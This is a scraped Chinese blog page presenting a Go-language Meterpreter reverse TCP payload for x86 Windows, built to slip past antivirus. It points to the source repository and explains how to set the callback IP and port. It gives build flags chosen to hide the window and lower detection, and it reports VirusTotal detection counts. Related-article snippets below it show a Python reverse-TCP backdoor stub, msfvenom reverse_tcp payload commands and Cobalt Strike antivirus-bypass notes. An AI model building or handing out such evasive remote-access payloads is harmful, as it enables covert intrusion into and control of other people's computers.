Golang实现的x86下的Meterpreter reverse tcp

最新推荐文章于 2024-03-07 11:00:00 发布
最新推荐文章于 2024-03-07 11:00:00 发布
阅读量185 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/glawhack/article/details/105068482
版权
这篇博客介绍了如何使用Golang编写一个x86架构的Meterpreter reverse tcppayload,并进行了静态免杀优化。作者修改了EGESPLOIT项目代码以减小编译后程序的大小,目前约为1.2MB。通过调整go_meterpreter.go中的IP和端口,用户可以自行编译。文章还提及了免杀效果,编译后的程序在 VirusTotal 上的查杀率从最初的8/62降低到20/70,但Windows 10内置杀毒软件仍可能通过动态行为检测拦截该程序。
摘要由CSDN通过智能技术生成

Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter

做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。

使用方法

修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。

set GOARCH=386
go build -ldflags="-H windowsgui -w"

注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。

由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。

免杀效果

加入了Bypass AV的代码。

我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。

今天最新经过编译查杀结果为20/70。由于现在杀毒

最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
reverse-tunnel:反向隧道TCP和UDP
05-06
反向隧道TCP和UDP rtun是用于通过公共网关服务器将TCP和UDP端口公开给Internet的工具。 您可以在防火墙和NAT之后的计算机上公开ssh和mosh服务器。 建造 中提供了已编译的二进制文件。 要构建自己的存储库,请克隆存储库并进行以下操作: $ git clone https://github.com/snsinfu/reverse-tunnel $ cd reverse-tunnel $ make 或者, $ go build -o rtun github.com/snsinfu/reverse-tunnel/agent/cmd $ go build -o rtun-server github.com/snsinfu/reverse-tunnel/server/cmd 码头工人 Docker映像可用: 快速使用: $ docker run -it \ -
用Python写Reverse TCP 后门
IsTr33叨逼叨
11-09 411
看见一个老外用Python写的Reverse TCP后门。 小小修改了一下,让它支持Windows。 reverseTcp.py: #!/usr/bin/env python import socket, sys host = sys.argv[1] # Attacker's host address, usually '' port = int(sys.argv
msf的reverse_tcp和bind_tcp两者的区别
HoAd'blog
07-31 5670
msf的reverse_tcp和bind_tcp两者的区别reverse_tcpbind_tcpreverse_httpreverse_https安全性 reverse_tcp 攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=0.0.0.0 lport=4444 -f elf -o shell bi
golangtcp自动重连实现方法
09-21
### Golang中的TCP自动重连实现方法 #### 一、背景与需求 在现代网络通信中,TCP协议因其可靠的特性而被广泛应用于多种场景。然而,在实际应用中,由于网络环境的复杂性(如网络拥塞、丢包、断线等),TCP连接可能...
golang(基于goroutine实现tcp聊天室)
最新发布
07-11
golang(基于goroutine实现tcp聊天室)
利用Golang实现TCP连接的双向拷贝详解
09-21
Golang实现TCP连接的双向拷贝,通常用于创建代理服务器或数据中继服务,使得数据可以在两个TCP连接之间自由流动。以下是对这一技术的深入解析。 首先,最基本的实现方式是为每个新到来的服务器连接创建一个新的...
GoLang 实现TCP/Socket:(一) 客户端
10-23
GoLang 实现TCP Socket 客户端 ,模拟与服务器通信的例子
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8689
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
metasploit中Payload的reverse_tcp和bind_tcp的区别
04-19 1万+
bind_tcpreverse_tcp这两者的执行过程可以d
Reverse_tcp反向连接获得shell实验
把梦想放飞在蓝色的天空里...
08-08 1万+
Reverse_tcp反向连接获得shell实验 准备工作: VMWare的桥接模式: 这是一种很重要的模式,如图: 设置成桥接模式后,设置虚拟机里的ip地址时,其地址可以跟外边主机在同一个网段,同一个DNS,同样的掩码,虚拟机就相当于局域网里的另一台主机。 如果双方的防火墙都关闭了的话,主机和虚拟机是可以相互ping通的。 虚拟机还可以访问互联网,使用起来相当的方便。   简
内网渗透 Metasploit(MSF)基础使用
m0_59598029的博客
03-07 1041
msfvenom 是 msf 生成 payload 的一个工具这里要区分一下 EXP 与 Payload :EXP 是利用漏洞进行攻击动作,而 payload 是 EXP 执行成功后在目标内进行各种指令动作。除了可以将 payload 插入到 exp 里面,也可以作为独立模块进行生成,需要用这个工具生成一个落地化的,类似于会话,可移植性各种操作Armitage 就是一款使用 Java 为 Metasploit 编写的有图形化操作界面的软件,通过它可以轻松的使用 Metasploit 对目标进行攻击。
渗透测试神器-msf基础
2301_77147676的博客
03-23 223
Exploit:msf最核心的模块,里面有针对不同操作系统不同服务的攻击,包括mac和andriodencoders没啥用,编码,自己提供编码倒是可以evasion:免杀,也没啥用,现在免杀也免不了被杀Ms17-010:ms指微软17-010指17年编号010的漏洞。
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
【网络安全】渗透测试神器-msf基础
2201_75856701的博客
03-09 555
Exploit:msf最核心的模块,里面有针对不同操作系统不同服务的攻击,包括mac和andriodencoders没啥用,编码,自己提供编码倒是可以evasion:免杀,也没啥用,现在免杀也免不了被杀Ms17-010:ms指微软17-010指17年编号010的漏洞。
Meterpreter命令详解
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
cobaltstrike4.3插件——BypassAV免杀使用
wdsj_xh的博客
05-12 5848
0x01* 环境介绍 本次免杀所使用的是shellcode分离免杀技术 cobaltstrike4.3客户端:Windows10 专业版 cobaltstrike4.3客户端:自己VPS CS版本:4.3 语言环境:Golang,插件需要本地安装Golang环境,生成木马时会调用编译 cobaltstrike4.3下载和使用见前面文章,CSDN应该发不了破解类东西啦,贴下自己网站链接 http://www.digter8.com/391.html CS 4.3下载 http://www.digter8.co
Golang实现的学生信息管理系统教程
“学生信息管理系统golang练手小项目,适合新手入门,使用Golang语言编写,包含数据库连接、功能菜单显示、学生信息操作等功能。” 在本文中,我们将详细探讨这个基于Golang的学生信息管理系统的核心知识点,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值